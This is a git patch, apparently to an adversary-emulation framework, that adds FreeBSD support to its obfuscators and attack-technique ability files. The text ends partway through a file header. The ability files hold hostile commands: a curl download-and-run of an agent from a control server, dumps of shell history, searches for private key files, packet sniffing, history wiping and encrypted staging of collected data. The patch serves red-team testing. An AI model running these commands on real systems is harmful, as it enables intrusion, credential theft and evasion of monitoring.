From 91bca397bea446b995c659d1a78763ee2de7f255 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alonso=20C=C3=A1rdenas?= Date: Sat, 29 Apr 2023 03:07:01 -0500 Subject: [PATCH 1/2] Add support for FreeBSD --- app/obfuscators/base64_basic.py | 1 + app/obfuscators/base64_jumble.py | 1 + app/obfuscators/base64_no_padding.py | 1 + app/obfuscators/caesar_cipher.py | 1 + app/obfuscators/steganography.py | 1 + .../02de522f-7e0a-4544-8afc-0c195f400f5f.yml | 2 +- .../10fad81e-3f68-47be-83b6-fbee7711c6a9.yml | 2 +- .../30a8cf10-73dc-497c-8261-a64cc9e91505.yml | 4 ++-- .../4e97e699-93d7-4040-b5a3-2e906a58199e.yml | 2 +- .../6469befa-748a-4b9c-a96d-f191fde47d89.yml | 2 +- .../720a3356-eee1-4015-9135-0fc08f7eb2d5.yml | 4 ++-- .../89955f55-529d-4d58-bed4-fed9e42515ec.yml | 2 +- .../90c2efaa-8205-480d-8bb6-61d90dbaf81b.yml | 2 +- .../b007fe0c-c6b0-4fda-915c-255bbc070de2.yml | 2 +- .../0ab383be-b819-41bf-91b9-1bd4404d83bf.yml | 9 +++++++++ .../1b4fb81c-8090-426c-93ab-0a633e7a16a7.yml | 5 +++++ .../422526ec-27e9-429a-995b-c686a29561a4.yml | 8 +++++++- .../de632c2d-a729-4b77-b781-6a6b09c148ba.yml | 4 ++-- .../36eecb80-ede3-442b-8774-956e906aff02.yml | 2 +- .../43b3754c-def4-4699-a673-1d85648fda6a.yml | 6 +++++- .../4cd4eb44-29a7-4259-91ae-e457b283a880.yml | 4 ++-- .../5f844ac9-5f24-4196-a70d-17f0bd44a934.yml | 4 ++-- .../30732a56-4a23-4307-9544-09caf2ed29d5.yml | 2 +- .../335cea7b-bec0-48c6-adfb-6066070f5f68.yml | 2 +- .../3a2ce3d5-e9e2-4344-ae23-470432ff8687.yml | 2 +- .../3b5db901-2cb8-4df7-8043-c4628a6a5d5a.yml | 2 +- .../47abe1f5-55a5-46cc-8cad-506dac8ea6d9.yml | 11 +++++++++++ .../52177cc1-b9ab-4411-ac21-2eadc4b5d3b8.yml | 2 +- .../5a39d7ed-45c9-4a79-b581-e5fb99e24f65.yml | 4 ++-- .../5c4dd985-89e3-4590-9b57-71fed66ff4e2.yml | 4 ++-- .../5f77ecf9-613f-4863-8d2f-ed6b447a4633.yml | 2 +- .../638fb6bb-ba39-4285-93d1-7e4775b033a8.yml | 4 ++++ .../6c91884e-11ec-422f-a6ed-e76774b0daac.yml | 2 +- .../6e1a53c0-7352-4899-be35-fa7f364d5722.yml | 2 +- .../830bb6ed-9594-4817-b1a1-c298c0f9f425.yml | 4 ++++ .../85341c8c-4ecb-4579-8f53-43e3e91d7617.yml | 4 ++-- .../9849d956-37ea-49f2-a8b5-f2ca080b315d.yml | 2 +- .../a41c2324-8c63-4b15-b3c5-84f920d1f226.yml | 2 +- .../b18e8767-b7ea-41a3-8e80-baf65a5ddef5.yml | 4 ++++ .../b6f545ef-f802-4537-b59d-2cb19831c8ed.yml | 4 ++-- .../bd527b63-9f9e-46e0-9816-b8434d2b8989.yml | 2 +- .../c0da588f-79f0-4263-8998-7496b1a40596.yml | 2 +- .../c1cd6388-3ced-48c7-a511-0434c6ba8f48.yml | 2 +- .../ce485320-41a4-42e8-a510-f5a8fe96a644.yml | 2 +- .../e8017c46-acb8-400c-a4b5-b3362b5b5baa.yml | 2 +- .../e82f39e2-56f8-4f19-8376-b007f9ac5f8a.yml | 6 +++++- .../fa6e8607-e0b1-425d-8924-9b894da5a002.yml | 2 +- .../b1d41972-3ad9-4aa1-8f7f-05f049a2980e.yml | 2 +- .../0582dc26-e0cf-4645-88cf-f37a02279976.yml | 2 +- .../110cea7a-5b03-4443-92ee-7ccefaead451.yml | 4 ++-- .../2f90d4de-2612-4468-9251-b220e3727452.yml | 2 +- .../300157e5-f4ad-4569-b533-9d1fa0e74d74.yml | 4 ++-- .../3ce95a28-25fc-4a7e-a0cd-0fdb190e2081.yml | 4 ++-- .../4a1120a5-971c-457f-bb07-60641b4723fd.yml | 2 +- .../5c5b0392-1daa-45e1-967c-2f361ce78849.yml | 2 +- .../a201bec2-a193-4b58-bf0e-57fa621da474.yml | 4 ++-- .../ba0deadb-97ac-4a4c-aa81-21912fc90980.yml | 2 +- .../d754878c-17dd-46dc-891c-a993f8a10336.yml | 4 ++-- .../e7bf5dc7-62e4-48b2-acf8-abaf8734c19c.yml | 4 ++-- .../ea713bc4-63f0-491c-9a6f-0b01d560b87e.yml | 2 +- .../impact/46da2385-cf37-49cb-ba4b-a739c7a19de4.yml | 13 +++++++++++++ .../impact/47d08617-5ce1-424a-8cc5-c9c978ce6bf9.yml | 2 +- .../impact/55f9600a-756f-496b-b27f-682052dc429c.yml | 2 +- .../10a9d979-e342-418a-a9b0-002c483e0fa6.yml | 9 +++++++++ .../4908fdc4-74fc-4d7c-8935-26d11ad26a8d.yml | 8 ++++++++ .../10681f2f-be03-44af-858d-f2b0812df185.yml | 6 ++++++ 66 files changed, 158 insertions(+), 66 deletions(-) diff --git a/app/obfuscators/base64_basic.py b/app/obfuscators/base64_basic.py index 81d35abd..7fc2d626 100644 --- a/app/obfuscators/base64_basic.py +++ b/app/obfuscators/base64_basic.py @@ -10,6 +10,7 @@ def supported_platforms(self): return dict( windows=['psh'], darwin=['sh'], + freebsd=['sh'], linux=['sh'] ) diff --git a/app/obfuscators/base64_jumble.py b/app/obfuscators/base64_jumble.py index 46ada7af..406b2527 100644 --- a/app/obfuscators/base64_jumble.py +++ b/app/obfuscators/base64_jumble.py @@ -14,6 +14,7 @@ def supported_platforms(self): return dict( windows=['psh'], darwin=['sh'], + freebsd=['sh'], linux=['sh'] ) diff --git a/app/obfuscators/base64_no_padding.py b/app/obfuscators/base64_no_padding.py index a603b803..c5b03731 100644 --- a/app/obfuscators/base64_no_padding.py +++ b/app/obfuscators/base64_no_padding.py @@ -8,6 +8,7 @@ def supported_platforms(self): return dict( windows=['psh'], darwin=['sh'], + freebsd=['sh'], linux=['sh'] ) diff --git a/app/obfuscators/caesar_cipher.py b/app/obfuscators/caesar_cipher.py index 0a65c08a..5ac3fb14 100644 --- a/app/obfuscators/caesar_cipher.py +++ b/app/obfuscators/caesar_cipher.py @@ -10,6 +10,7 @@ def supported_platforms(self): return dict( windows=['psh'], darwin=['sh'], + freebsd=['sh'], linux=['sh'] ) diff --git a/app/obfuscators/steganography.py b/app/obfuscators/steganography.py index 23fdc93a..18364e27 100644 --- a/app/obfuscators/steganography.py +++ b/app/obfuscators/steganography.py @@ -14,6 +14,7 @@ class Obfuscation(BaseObfuscator): def supported_platforms(self): return dict( darwin=['sh'], + freebsd=['sh'], linux=['sh'] ) diff --git a/data/abilities/collection/02de522f-7e0a-4544-8afc-0c195f400f5f.yml b/data/abilities/collection/02de522f-7e0a-4544-8afc-0c195f400f5f.yml index 69792ab0..9df3d9ef 100644 --- a/data/abilities/collection/02de522f-7e0a-4544-8afc-0c195f400f5f.yml +++ b/data/abilities/collection/02de522f-7e0a-4544-8afc-0c195f400f5f.yml @@ -15,7 +15,7 @@ parsers: plugins.stockpile.app.parsers.ssh: - source: remote.ssh.cmd - linux: + freebsd,linux: sh: command: | pip install -q stormssh 2> /dev/null && storm list | sed 's/\x1b\[[0-9;]*m//g' diff --git a/data/abilities/collection/10fad81e-3f68-47be-83b6-fbee7711c6a9.yml b/data/abilities/collection/10fad81e-3f68-47be-83b6-fbee7711c6a9.yml index f3896625..0ad14a63 100644 --- a/data/abilities/collection/10fad81e-3f68-47be-83b6-fbee7711c6a9.yml +++ b/data/abilities/collection/10fad81e-3f68-47be-83b6-fbee7711c6a9.yml @@ -33,7 +33,7 @@ parsers: plugins.stockpile.app.parsers.basic: - source: host.dir.staged - linux: + freebsd,linux: sh: command: | chmod +x ./file_search.sh; ./file_search.sh --extensions '#{linux.included.extensions}' diff --git a/data/abilities/collection/30a8cf10-73dc-497c-8261-a64cc9e91505.yml b/data/abilities/collection/30a8cf10-73dc-497c-8261-a64cc9e91505.yml index 5dc10231..a16e7e0a 100644 --- a/data/abilities/collection/30a8cf10-73dc-497c-8261-a64cc9e91505.yml +++ b/data/abilities/collection/30a8cf10-73dc-497c-8261-a64cc9e91505.yml @@ -8,7 +8,7 @@ attack_id: T1560.001 name: "Archive Collected Data: Archive via Utility" platforms: - linux: + freebsd,linux: sh: command: | tar -C #{host.dir.staged} -czf - . | gpg -c --pinentry-mode=loopback --passphrase #{host.archive.password} > #{host.dir.staged}.tar.gz.gpg && echo #{host.dir.staged}.tar.gz.gpg @@ -29,4 +29,4 @@ - source: host.dir.compress requirements: - plugins.stockpile.app.requirements.paw_provenance: - - source: host.dir.staged \ No newline at end of file + - source: host.dir.staged diff --git a/data/abilities/collection/4e97e699-93d7-4040-b5a3-2e906a58199e.yml b/data/abilities/collection/4e97e699-93d7-4040-b5a3-2e906a58199e.yml index 30a606fe..ee81ba05 100644 --- a/data/abilities/collection/4e97e699-93d7-4040-b5a3-2e906a58199e.yml +++ b/data/abilities/collection/4e97e699-93d7-4040-b5a3-2e906a58199e.yml @@ -12,7 +12,7 @@ sh: command: | cp #{host.file.path[filters(technique=T1005,max=3)]} #{host.dir.staged[filters(max=1)]} - linux: + freebsd,linux: sh: command: | cp #{host.file.path[filters(technique=T1005,max=3)]} #{host.dir.staged[filters(max=1)]} diff --git a/data/abilities/collection/6469befa-748a-4b9c-a96d-f191fde47d89.yml b/data/abilities/collection/6469befa-748a-4b9c-a96d-f191fde47d89.yml index e139e3a9..ffb7e936 100644 --- a/data/abilities/collection/6469befa-748a-4b9c-a96d-f191fde47d89.yml +++ b/data/abilities/collection/6469befa-748a-4b9c-a96d-f191fde47d89.yml @@ -17,7 +17,7 @@ parsers: plugins.stockpile.app.parsers.basic: - source: host.dir.staged - linux: + freebsd,linux: sh: command: | mkdir -p staged && echo $PWD/staged diff --git a/data/abilities/collection/720a3356-eee1-4015-9135-0fc08f7eb2d5.yml b/data/abilities/collection/720a3356-eee1-4015-9135-0fc08f7eb2d5.yml index 10493860..9dcdd03d 100644 --- a/data/abilities/collection/720a3356-eee1-4015-9135-0fc08f7eb2d5.yml +++ b/data/abilities/collection/720a3356-eee1-4015-9135-0fc08f7eb2d5.yml @@ -6,7 +6,7 @@ attack_id: T1005 name: Data from Local System platforms: - linux: + freebsd,linux: sh: command: | for directoryname in $(find /home/ -name '.git' -type d 2>/dev/null | head -5); do @@ -21,4 +21,4 @@ Get-ChildItem C:\Users -Attributes Directory+Hidden -ErrorAction SilentlyContinue -Filter ".git" -Recurse | foreach {$_.parent.FullName} | Select-Object; exit 0; parsers: plugins.stockpile.app.parsers.basic: - - source: host.dir.git \ No newline at end of file + - source: host.dir.git diff --git a/data/abilities/collection/89955f55-529d-4d58-bed4-fed9e42515ec.yml b/data/abilities/collection/89955f55-529d-4d58-bed4-fed9e42515ec.yml index 7a353b4f..dc364c3f 100644 --- a/data/abilities/collection/89955f55-529d-4d58-bed4-fed9e42515ec.yml +++ b/data/abilities/collection/89955f55-529d-4d58-bed4-fed9e42515ec.yml @@ -12,7 +12,7 @@ sh: command: | curl #{remote.host.socket} - linux: + freebsd,linux: sh: command: | curl #{remote.host.socket} diff --git a/data/abilities/collection/90c2efaa-8205-480d-8bb6-61d90dbaf81b.yml b/data/abilities/collection/90c2efaa-8205-480d-8bb6-61d90dbaf81b.yml index b10db4a3..e5f1e560 100644 --- a/data/abilities/collection/90c2efaa-8205-480d-8bb6-61d90dbaf81b.yml +++ b/data/abilities/collection/90c2efaa-8205-480d-8bb6-61d90dbaf81b.yml @@ -27,7 +27,7 @@ - source: host.file.path edge: has_extension target: file.sensitive.extension - linux: + freebsd,linux: sh: command: | find / -name '*.#{file.sensitive.extension}' -type f -not -path '*/\.*' -size -500k 2>/dev/null | head -5 diff --git a/data/abilities/collection/b007fe0c-c6b0-4fda-915c-255bbc070de2.yml b/data/abilities/collection/b007fe0c-c6b0-4fda-915c-255bbc070de2.yml index e01109e2..831c6894 100644 --- a/data/abilities/collection/b007fe0c-c6b0-4fda-915c-255bbc070de2.yml +++ b/data/abilities/collection/b007fe0c-c6b0-4fda-915c-255bbc070de2.yml @@ -16,7 +16,7 @@ psh,pwsh: command: | Get-Clipboard -raw - linux: + freebsd,linux: sh: command: | xclip -o diff --git a/data/abilities/command-and-control/0ab383be-b819-41bf-91b9-1bd4404d83bf.yml b/data/abilities/command-and-control/0ab383be-b819-41bf-91b9-1bd4404d83bf.yml index 2a65bed3..a1956274 100644 --- a/data/abilities/command-and-control/0ab383be-b819-41bf-91b9-1bd4404d83bf.yml +++ b/data/abilities/command-and-control/0ab383be-b819-41bf-91b9-1bd4404d83bf.yml @@ -15,6 +15,15 @@ python ragdoll.py -W $server#{app.contact.html} cleanup: | pkill -f ragdoll + freebsd: + sh: + command: | + server="#{app.contact.http}"; + curl -s -X POST -H "file:ragdoll.py" -H "platform:freebsd" $server/file/download > ragdoll.py; + pip install requests beautifulsoup4; + python3.9 ragdoll.py -W $server#{app.contact.html} + cleanup: | + pkill -f ragdoll linux: sh: command: | diff --git a/data/abilities/credential-access/1b4fb81c-8090-426c-93ab-0a633e7a16a7.yml b/data/abilities/credential-access/1b4fb81c-8090-426c-93ab-0a633e7a16a7.yml index 8d4e2886..f4870f86 100644 --- a/data/abilities/credential-access/1b4fb81c-8090-426c-93ab-0a633e7a16a7.yml +++ b/data/abilities/credential-access/1b4fb81c-8090-426c-93ab-0a633e7a16a7.yml @@ -33,3 +33,8 @@ sh: command: | tcpdump -i en0 & sleep 5; kill $! + freebsd: + sh: + command: | + tcpdump -i em0 & sleep 5; kill $! + diff --git a/data/abilities/credential-access/422526ec-27e9-429a-995b-c686a29561a4.yml b/data/abilities/credential-access/422526ec-27e9-429a-995b-c686a29561a4.yml index 0592b563..8ac6af53 100644 --- a/data/abilities/credential-access/422526ec-27e9-429a-995b-c686a29561a4.yml +++ b/data/abilities/credential-access/422526ec-27e9-429a-995b-c686a29561a4.yml @@ -2,7 +2,7 @@ - id: 422526ec-27e9-429a-995b-c686a29561a4 name: Dump history - description: Get contents of bash history + description: Get contents of bash/csh history tactic: credential-access technique: attack_id: T1552.003 @@ -14,6 +14,12 @@ parsers: plugins.stockpile.app.parsers.ssh: - source: remote.ssh.cmd + freebsd: + sh: + command: cat ~/.history + parsers: + plugins.stockpile.app.parsers.ssh: + - source: remote.ssh.cmd linux: sh: command: cat ~/.bash_history diff --git a/data/abilities/credential-access/de632c2d-a729-4b77-b781-6a6b09c148ba.yml b/data/abilities/credential-access/de632c2d-a729-4b77-b781-6a6b09c148ba.yml index 336e309b..5bcc1cba 100644 --- a/data/abilities/credential-access/de632c2d-a729-4b77-b781-6a6b09c148ba.yml +++ b/data/abilities/credential-access/de632c2d-a729-4b77-b781-6a6b09c148ba.yml @@ -19,7 +19,7 @@ sh: command: | for i in .key .pgp .gpg .ppk .p12 .pem .pfx .cer .p7b .asc .crt;do find /Users -maxdepth 3 -name "*${i}" 2>/dev/null;done; - linux: + freebsd,linux: sh: command: | - for i in .key .pgp .gpg .ppk .p12 .pem .pfx .cer .p7b .asc .crt;do find /etc -maxdepth 3 -name "*${i}" 2>/dev/null;done; \ No newline at end of file + for i in .key .pgp .gpg .ppk .p12 .pem .pfx .cer .p7b .asc .crt;do find /etc -maxdepth 3 -name "*${i}" 2>/dev/null;done; diff --git a/data/abilities/defense-evasion/36eecb80-ede3-442b-8774-956e906aff02.yml b/data/abilities/defense-evasion/36eecb80-ede3-442b-8774-956e906aff02.yml index 0f978da2..bf80d271 100644 --- a/data/abilities/defense-evasion/36eecb80-ede3-442b-8774-956e906aff02.yml +++ b/data/abilities/defense-evasion/36eecb80-ede3-442b-8774-956e906aff02.yml @@ -11,7 +11,7 @@ darwin: sh: command: sleep 60 - linux: + freebsd,linux: sh: command: sleep 60 windows: diff --git a/data/abilities/defense-evasion/43b3754c-def4-4699-a673-1d85648fda6a.yml b/data/abilities/defense-evasion/43b3754c-def4-4699-a673-1d85648fda6a.yml index 0a5e1629..1b6dcc8d 100644 --- a/data/abilities/defense-evasion/43b3754c-def4-4699-a673-1d85648fda6a.yml +++ b/data/abilities/defense-evasion/43b3754c-def4-4699-a673-1d85648fda6a.yml @@ -12,10 +12,14 @@ sh: command: | > $HOME/.bash_history && unset HISTFILE + freebsd: + sh: + command: | + > $HOME/.history && set history = 0 linux: sh: command: | > $HOME/.bash_history && unset HISTFILE windows: psh: - command: Clear-History;Clear \ No newline at end of file + command: Clear-History;Clear diff --git a/data/abilities/defense-evasion/4cd4eb44-29a7-4259-91ae-e457b283a880.yml b/data/abilities/defense-evasion/4cd4eb44-29a7-4259-91ae-e457b283a880.yml index bf021d39..b7bad235 100644 --- a/data/abilities/defense-evasion/4cd4eb44-29a7-4259-91ae-e457b283a880.yml +++ b/data/abilities/defense-evasion/4cd4eb44-29a7-4259-91ae-e457b283a880.yml @@ -12,11 +12,11 @@ sh: cleanup: | rm #{payload} - linux: + freebsd,linux: sh: cleanup: | rm #{payload} windows: psh,pwsh: cleanup: | - Remove-Item -Force -Path "#{payload}" \ No newline at end of file + Remove-Item -Force -Path "#{payload}" diff --git a/data/abilities/defense-evasion/5f844ac9-5f24-4196-a70d-17f0bd44a934.yml b/data/abilities/defense-evasion/5f844ac9-5f24-4196-a70d-17f0bd44a934.yml index c7615901..4bf6ff61 100644 --- a/data/abilities/defense-evasion/5f844ac9-5f24-4196-a70d-17f0bd44a934.yml +++ b/data/abilities/defense-evasion/5f844ac9-5f24-4196-a70d-17f0bd44a934.yml @@ -25,9 +25,9 @@ path="$(pwd)/#{exe_name}"; num_processes=$(for id in $(pgrep -f #{exe_name}); do lsof -p $id 2> /dev/null | grep "$path"; done | wc -l); if [ "$num_processes" -le 1 ]; then /bin/rm -f "$path"; fi; - linux: + freebsd,linux: sh: command: | path="$(pwd)/#{exe_name}"; num_processes=$(for id in $(pgrep -f #{exe_name}); do lsof -p $id 2> /dev/null | grep "$path"; done | wc -l); - if [ "$num_processes" -le 1 ]; then /bin/rm -f "$path"; fi; \ No newline at end of file + if [ "$num_processes" -le 1 ]; then /bin/rm -f "$path"; fi; diff --git a/data/abilities/discovery/30732a56-4a23-4307-9544-09caf2ed29d5.yml b/data/abilities/discovery/30732a56-4a23-4307-9544-09caf2ed29d5.yml index 189852a8..ba2d5cb0 100644 --- a/data/abilities/discovery/30732a56-4a23-4307-9544-09caf2ed29d5.yml +++ b/data/abilities/discovery/30732a56-4a23-4307-9544-09caf2ed29d5.yml @@ -12,7 +12,7 @@ sh: command: | find / -type d -user #{host.user.name} \( -perm -g+w -or -perm -o+w \) 2>/dev/null -exec ls -adl {} \; - linux: + freebsd,linux: sh: command: | find / -type d -user #{host.user.name} \( -perm -g+w -or -perm -o+w \) 2>/dev/null -exec ls -adl {} \; diff --git a/data/abilities/discovery/335cea7b-bec0-48c6-adfb-6066070f5f68.yml b/data/abilities/discovery/335cea7b-bec0-48c6-adfb-6066070f5f68.yml index a5e12f8e..11866775 100644 --- a/data/abilities/discovery/335cea7b-bec0-48c6-adfb-6066070f5f68.yml +++ b/data/abilities/discovery/335cea7b-bec0-48c6-adfb-6066070f5f68.yml @@ -12,7 +12,7 @@ sh: command: | ps - linux: + freebsd,linux: sh: command: | ps diff --git a/data/abilities/discovery/3a2ce3d5-e9e2-4344-ae23-470432ff8687.yml b/data/abilities/discovery/3a2ce3d5-e9e2-4344-ae23-470432ff8687.yml index a46c3eef..95fc87cf 100644 --- a/data/abilities/discovery/3a2ce3d5-e9e2-4344-ae23-470432ff8687.yml +++ b/data/abilities/discovery/3a2ce3d5-e9e2-4344-ae23-470432ff8687.yml @@ -12,7 +12,7 @@ sh: command: | nmap -sV -p #{remote.host.port} #{remote.host.ip} - linux: + freebsd,linux: sh: command: | nmap -sV -p #{remote.host.port} #{remote.host.ip} diff --git a/data/abilities/discovery/3b5db901-2cb8-4df7-8043-c4628a6a5d5a.yml b/data/abilities/discovery/3b5db901-2cb8-4df7-8043-c4628a6a5d5a.yml index fa4d6878..3e5a84ed 100644 --- a/data/abilities/discovery/3b5db901-2cb8-4df7-8043-c4628a6a5d5a.yml +++ b/data/abilities/discovery/3b5db901-2cb8-4df7-8043-c4628a6a5d5a.yml @@ -12,7 +12,7 @@ sh: command: | ps aux | grep #{host.user.name} - linux: + freebsd,linux: sh: command: | ps aux | grep #{host.user.name} diff --git a/data/abilities/discovery/47abe1f5-55a5-46cc-8cad-506dac8ea6d9.yml b/data/abilities/discovery/47abe1f5-55a5-46cc-8cad-506dac8ea6d9.yml index 9428b9de..dc7aacf5 100644 --- a/data/abilities/discovery/47abe1f5-55a5-46cc-8cad-506dac8ea6d9.yml +++ b/data/abilities/discovery/47abe1f5-55a5-46cc-8cad-506dac8ea6d9.yml @@ -17,6 +17,17 @@ target: remote.host.port payloads: - scanner.py + freebsd: + sh: + command: | + python3.9 scanner.py -i #{remote.host.ip} + parsers: + plugins.stockpile.app.parsers.scan: + - source: remote.host.ip + edge: has_open_port + target: remote.host.port + payloads: + - scanner.py linux: sh: command: | diff --git a/data/abilities/discovery/52177cc1-b9ab-4411-ac21-2eadc4b5d3b8.yml b/data/abilities/discovery/52177cc1-b9ab-4411-ac21-2eadc4b5d3b8.yml index 6b5020fd..4c5ac18b 100644 --- a/data/abilities/discovery/52177cc1-b9ab-4411-ac21-2eadc4b5d3b8.yml +++ b/data/abilities/discovery/52177cc1-b9ab-4411-ac21-2eadc4b5d3b8.yml @@ -12,7 +12,7 @@ sh: command: | ls - linux: + freebsd,linux: sh: command: | ls diff --git a/data/abilities/discovery/5a39d7ed-45c9-4a79-b581-e5fb99e24f65.yml b/data/abilities/discovery/5a39d7ed-45c9-4a79-b581-e5fb99e24f65.yml index e896815e..6f528d24 100644 --- a/data/abilities/discovery/5a39d7ed-45c9-4a79-b581-e5fb99e24f65.yml +++ b/data/abilities/discovery/5a39d7ed-45c9-4a79-b581-e5fb99e24f65.yml @@ -42,6 +42,6 @@ darwin: sh: command: ps aux - linux: + freebsd,linux: sh: - command: ps aux \ No newline at end of file + command: ps aux diff --git a/data/abilities/discovery/5c4dd985-89e3-4590-9b57-71fed66ff4e2.yml b/data/abilities/discovery/5c4dd985-89e3-4590-9b57-71fed66ff4e2.yml index 47005640..785bed27 100644 --- a/data/abilities/discovery/5c4dd985-89e3-4590-9b57-71fed66ff4e2.yml +++ b/data/abilities/discovery/5c4dd985-89e3-4590-9b57-71fed66ff4e2.yml @@ -15,6 +15,6 @@ darwin: sh: command: groups - linux: + freebsd,linux: sh: - command: groups \ No newline at end of file + command: groups diff --git a/data/abilities/discovery/5f77ecf9-613f-4863-8d2f-ed6b447a4633.yml b/data/abilities/discovery/5f77ecf9-613f-4863-8d2f-ed6b447a4633.yml index 46042331..05929f6c 100644 --- a/data/abilities/discovery/5f77ecf9-613f-4863-8d2f-ed6b447a4633.yml +++ b/data/abilities/discovery/5f77ecf9-613f-4863-8d2f-ed6b447a4633.yml @@ -12,7 +12,7 @@ sh: command: | cat ~/.ssh/known_hosts - linux: + freebsd,linux: sh: command: | cat ~/.ssh/known_hosts diff --git a/data/abilities/discovery/638fb6bb-ba39-4285-93d1-7e4775b033a8.yml b/data/abilities/discovery/638fb6bb-ba39-4285-93d1-7e4775b033a8.yml index 13a57b7c..ae2eced0 100644 --- a/data/abilities/discovery/638fb6bb-ba39-4285-93d1-7e4775b033a8.yml +++ b/data/abilities/discovery/638fb6bb-ba39-4285-93d1-7e4775b033a8.yml @@ -11,6 +11,10 @@ sh: command: | netstat -anto + freebsd: + sh: + command: | + netstat -aSp tcp linux: sh: command: | diff --git a/data/abilities/discovery/6c91884e-11ec-422f-a6ed-e76774b0daac.yml b/data/abilities/discovery/6c91884e-11ec-422f-a6ed-e76774b0daac.yml index 716c9161..cded4004 100644 --- a/data/abilities/discovery/6c91884e-11ec-422f-a6ed-e76774b0daac.yml +++ b/data/abilities/discovery/6c91884e-11ec-422f-a6ed-e76774b0daac.yml @@ -14,7 +14,7 @@ - source: host.print.file edge: has_size target: host.print.size - linux: + freebsd,linux: sh: command: lpq -a parsers: diff --git a/data/abilities/discovery/6e1a53c0-7352-4899-be35-fa7f364d5722.yml b/data/abilities/discovery/6e1a53c0-7352-4899-be35-fa7f364d5722.yml index 333ca185..70174b63 100644 --- a/data/abilities/discovery/6e1a53c0-7352-4899-be35-fa7f364d5722.yml +++ b/data/abilities/discovery/6e1a53c0-7352-4899-be35-fa7f364d5722.yml @@ -12,7 +12,7 @@ sh: command: | pwd - linux: + freebsd,linux: sh: command: | pwd diff --git a/data/abilities/discovery/830bb6ed-9594-4817-b1a1-c298c0f9f425.yml b/data/abilities/discovery/830bb6ed-9594-4817-b1a1-c298c0f9f425.yml index 3511bbe3..464f121d 100644 --- a/data/abilities/discovery/830bb6ed-9594-4817-b1a1-c298c0f9f425.yml +++ b/data/abilities/discovery/830bb6ed-9594-4817-b1a1-c298c0f9f425.yml @@ -12,6 +12,10 @@ sh: command: | which google-chrome + freebsd: + sh: + command: | + which chrome linux: sh: command: | diff --git a/data/abilities/discovery/85341c8c-4ecb-4579-8f53-43e3e91d7617.yml b/data/abilities/discovery/85341c8c-4ecb-4579-8f53-43e3e91d7617.yml index 382a9c25..d958362c 100644 --- a/data/abilities/discovery/85341c8c-4ecb-4579-8f53-43e3e91d7617.yml +++ b/data/abilities/discovery/85341c8c-4ecb-4579-8f53-43e3e91d7617.yml @@ -14,7 +14,7 @@ parsers: plugins.stockpile.app.parsers.ipaddr: - source: remote.host.ip - linux: + freebsd,linux: sh: command: arp -a parsers: @@ -25,4 +25,4 @@ command: arp -a parsers: plugins.stockpile.app.parsers.ipaddr: - - source: remote.host.ip \ No newline at end of file + - source: remote.host.ip diff --git a/data/abilities/discovery/9849d956-37ea-49f2-a8b5-f2ca080b315d.yml b/data/abilities/discovery/9849d956-37ea-49f2-a8b5-f2ca080b315d.yml index b1d19484..20bf28d7 100644 --- a/data/abilities/discovery/9849d956-37ea-49f2-a8b5-f2ca080b315d.yml +++ b/data/abilities/discovery/9849d956-37ea-49f2-a8b5-f2ca080b315d.yml @@ -12,7 +12,7 @@ sh: command: | which go - linux: + freebsd,linux: sh: command: | which go diff --git a/data/abilities/discovery/a41c2324-8c63-4b15-b3c5-84f920d1f226.yml b/data/abilities/discovery/a41c2324-8c63-4b15-b3c5-84f920d1f226.yml index 884d3b27..dda4fa6f 100644 --- a/data/abilities/discovery/a41c2324-8c63-4b15-b3c5-84f920d1f226.yml +++ b/data/abilities/discovery/a41c2324-8c63-4b15-b3c5-84f920d1f226.yml @@ -6,7 +6,7 @@ attack_id: T1083 name: File and Directory Discovery platforms: - linux: + freebsd,linux: sh: command: 'find ~ -type f -name #{host.print.file} 2>/dev/null' parsers: diff --git a/data/abilities/discovery/b18e8767-b7ea-41a3-8e80-baf65a5ddef5.yml b/data/abilities/discovery/b18e8767-b7ea-41a3-8e80-baf65a5ddef5.yml index 14db1bb2..6bf357df 100644 --- a/data/abilities/discovery/b18e8767-b7ea-41a3-8e80-baf65a5ddef5.yml +++ b/data/abilities/discovery/b18e8767-b7ea-41a3-8e80-baf65a5ddef5.yml @@ -12,6 +12,10 @@ sh: command: | python3 --version;python2 --version;python --version + freebsd: + sh: + command: | + pkg version -x python3 | cut -d '-' -f2 | awk '{print $1}' && pkg version -x python2 | cut -d '-' -f2 | awk '{print $1}' linux: sh: command: | diff --git a/data/abilities/discovery/b6f545ef-f802-4537-b59d-2cb19831c8ed.yml b/data/abilities/discovery/b6f545ef-f802-4537-b59d-2cb19831c8ed.yml index 6ebc8595..ddcafe2d 100644 --- a/data/abilities/discovery/b6f545ef-f802-4537-b59d-2cb19831c8ed.yml +++ b/data/abilities/discovery/b6f545ef-f802-4537-b59d-2cb19831c8ed.yml @@ -8,7 +8,7 @@ attack_id: T1016 name: System Network Configuration Discovery platforms: - darwin: + darwin,freebsd: sh: command: | - ifconfig | grep broadcast \ No newline at end of file + ifconfig | grep broadcast diff --git a/data/abilities/discovery/bd527b63-9f9e-46e0-9816-b8434d2b8989.yml b/data/abilities/discovery/bd527b63-9f9e-46e0-9816-b8434d2b8989.yml index df30b696..55e5ef80 100644 --- a/data/abilities/discovery/bd527b63-9f9e-46e0-9816-b8434d2b8989.yml +++ b/data/abilities/discovery/bd527b63-9f9e-46e0-9816-b8434d2b8989.yml @@ -12,7 +12,7 @@ sh: command: | whoami - linux: + freebsd,linux: sh: command: | whoami diff --git a/data/abilities/discovery/c0da588f-79f0-4263-8998-7496b1a40596.yml b/data/abilities/discovery/c0da588f-79f0-4263-8998-7496b1a40596.yml index 1e08608c..3f91e87c 100644 --- a/data/abilities/discovery/c0da588f-79f0-4263-8998-7496b1a40596.yml +++ b/data/abilities/discovery/c0da588f-79f0-4263-8998-7496b1a40596.yml @@ -15,7 +15,7 @@ plugins.stockpile.app.parsers.basic: - source: host.user.name - source: domain.user.name - linux: + freebsd,linux: sh: command: whoami parsers: diff --git a/data/abilities/discovery/c1cd6388-3ced-48c7-a511-0434c6ba8f48.yml b/data/abilities/discovery/c1cd6388-3ced-48c7-a511-0434c6ba8f48.yml index 388e56a2..be9a2330 100644 --- a/data/abilities/discovery/c1cd6388-3ced-48c7-a511-0434c6ba8f48.yml +++ b/data/abilities/discovery/c1cd6388-3ced-48c7-a511-0434c6ba8f48.yml @@ -15,7 +15,7 @@ parsers: plugins.stockpile.app.parsers.basic: - source: host.user.name - linux: + freebsd,linux: sh: command: | cut -d: -f1 /etc/passwd | grep -v '_' | grep -v '#' diff --git a/data/abilities/discovery/ce485320-41a4-42e8-a510-f5a8fe96a644.yml b/data/abilities/discovery/ce485320-41a4-42e8-a510-f5a8fe96a644.yml index 